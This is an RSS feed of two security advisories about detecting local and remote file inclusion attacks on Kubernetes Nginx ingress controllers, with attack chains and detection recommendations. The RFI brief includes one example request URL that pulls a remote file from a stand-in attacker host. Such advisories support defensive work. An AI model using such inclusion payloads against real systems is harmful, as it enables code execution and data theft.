<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/"><channel><title>Nginx Ingress Controller - CraftedSignal Threat Feed</title><link>https://feed.craftedsignal.io/products/nginx-ingress-controller/</link><description>Trending threats, MITRE ATT&amp;CK coverage, and detection metadata. Fed continuously.</description><generator>Hugo</generator><language>en</language><managingEditor>hello@craftedsignal.io</managingEditor><webMaster>hello@craftedsignal.io</webMaster><lastBuildDate>Tue, 09 Jan 2024 12:00:00 +0000</lastBuildDate><atom:link href="https://feed.craftedsignal.io/products/nginx-ingress-controller/feed.xml" rel="self" type="application/rss+xml"/><item><title>Kubernetes Nginx Ingress LFI Attack</title><link>https://feed.craftedsignal.io/briefs/2024-01-09-kubernetes-nginx-lfi/</link><pubDate>Tue, 09 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-09-kubernetes-nginx-lfi/</guid><description>Detection of local file inclusion (LFI) attacks targeting Kubernetes Nginx ingress controllers through analysis of Kubernetes logs.</description><content:encoded><![CDATA[<p>This brief focuses on detecting local file inclusion (LFI) attacks targeting Kubernetes Nginx ingress controllers. These attacks are identified by analyzing Kubernetes logs for suspicious patterns indicative of LFI attempts. The detection leverages Kubernetes logs, specifically parsing the <code>request</code> field to identify LFI patterns. Successful exploitation can lead to attackers reading sensitive files from the server, potentially exposing critical information. This activity is significant because it can lead to unauthorized access to sensitive data, further exploitation, and potential compromise of the Kubernetes environment. The provided detection logic originates from Splunk's security content and is designed to work with Kubernetes logs ingested via Splunk Connect for Kubernetes.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker identifies a Kubernetes Nginx ingress controller vulnerable to LFI.</li>
<li>The attacker crafts a malicious HTTP request containing an LFI payload within the URL. This payload aims to access sensitive files on the server.</li>
<li>The crafted request is sent to the Kubernetes Nginx ingress controller.</li>
<li>The Nginx ingress controller processes the request and attempts to access the file specified in the malicious payload.</li>
<li>If the LFI vulnerability is successfully exploited, the targeted file's contents are exposed to the attacker.</li>
<li>The attacker retrieves the contents of the sensitive file from the HTTP response.</li>
<li>The attacker analyzes the exfiltrated file contents for sensitive information, such as credentials or configuration details.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>A successful LFI attack against a Kubernetes Nginx ingress controller can lead to the exposure of sensitive data, potentially including configuration files, credentials, or internal application code. This can lead to further exploitation, such as privilege escalation or lateral movement within the Kubernetes cluster. The number of affected systems and organizations depends on the scope of the vulnerable ingress controllers.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the provided Sigma rule to your SIEM to detect LFI attempts against Kubernetes Nginx ingress controllers based on suspicious URL patterns and log data.</li>
<li>Ensure that Kubernetes logs are being ingested through Splunk Connect for Kubernetes, as this is a prerequisite for the detection logic.</li>
<li>Investigate and remediate any identified LFI vulnerabilities in Kubernetes Nginx ingress controllers to prevent successful exploitation.</li>
<li>Use the provided drilldown searches to pivot into detection results based on host and risk events.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>kubernetes</category><category>lfi</category><category>nginx</category><category>ingress</category><category>cloud</category></item><item><title>Kubernetes Nginx Ingress Remote File Inclusion Attempt</title><link>https://feed.craftedsignal.io/briefs/2024-01-kubernetes-nginx-ingress-rfi/</link><pubDate>Wed, 03 Jan 2024 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-kubernetes-nginx-ingress-rfi/</guid><description>This analytic detects remote file inclusion (RFI) attacks targeting Kubernetes Nginx ingress controllers by analyzing Kubernetes logs from the Nginx ingress controller and identifying suspicious URL requests, potentially leading to arbitrary code execution or sensitive data access.</description><content:encoded><![CDATA[<p>This analytic focuses on detecting Remote File Inclusion (RFI) attacks against Kubernetes Nginx ingress controllers. RFI attacks exploit vulnerabilities that allow an attacker to include remote files, potentially leading to arbitrary code execution or access to sensitive information. The detection logic parses Kubernetes logs from the Nginx ingress controller, specifically examining the request URLs for suspicious patterns indicative of RFI attempts. Successful exploitation could grant attackers unauthorized access, facilitate data exfiltration, or further compromise the Kubernetes environment. This activity is particularly relevant for organizations using Kubernetes to host web applications and services, as ingress controllers act as the entry point for external traffic.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker identifies a Kubernetes Nginx ingress controller exposed to the internet.</li>
<li>The attacker crafts a malicious HTTP request containing a URL designed to exploit an RFI vulnerability. This URL often includes parameters that attempt to include remote files (e.g., <code>http://example.com/index.php?file=http://evil.com/malicious.txt</code>).</li>
<li>The attacker sends the malicious request to the Kubernetes Nginx ingress controller.</li>
<li>The Nginx ingress controller processes the request and attempts to include the remote file specified in the URL.</li>
<li>If the RFI vulnerability is successfully exploited, the attacker's malicious code or script is executed by the Nginx ingress controller.</li>
<li>The attacker gains unauthorized access to the Kubernetes environment or sensitive data.</li>
<li>The attacker uses the compromised ingress controller as a launchpad for further attacks within the Kubernetes cluster, such as lateral movement or data exfiltration.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful RFI attacks on Kubernetes Nginx ingress controllers can have significant consequences. Attackers can gain unauthorized access to sensitive data, including application code, configuration files, and credentials. They can also execute arbitrary code, potentially leading to a complete compromise of the Kubernetes cluster. The impact can range from data breaches and service disruptions to the deployment of malicious containers and the exfiltration of confidential information. The specific consequences depend on the nature of the targeted application and the attacker's objectives.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Enable and review Kubernetes container controller logs to capture relevant HTTP request data, as indicated by the <code>kubernetes_container_controller</code> macro in the search query.</li>
<li>Deploy the provided Sigma rule (<code>Kubernetes Nginx Ingress RFI Detection</code>) to identify suspicious URL patterns indicative of RFI attempts. Tune the rule based on your specific environment and application characteristics.</li>
<li>Implement regular vulnerability scanning and penetration testing of your Kubernetes Nginx ingress controllers to identify and remediate potential RFI vulnerabilities.</li>
<li>Ensure that your Nginx ingress controller is configured with the latest security patches and updates to mitigate known vulnerabilities.</li>
</ul>
]]></content:encoded><category domain="severity">medium</category><category domain="type">advisory</category><category>kubernetes</category><category>nginx</category><category>rfi</category><category>remote file inclusion</category><category>cloud</category></item></channel></rss>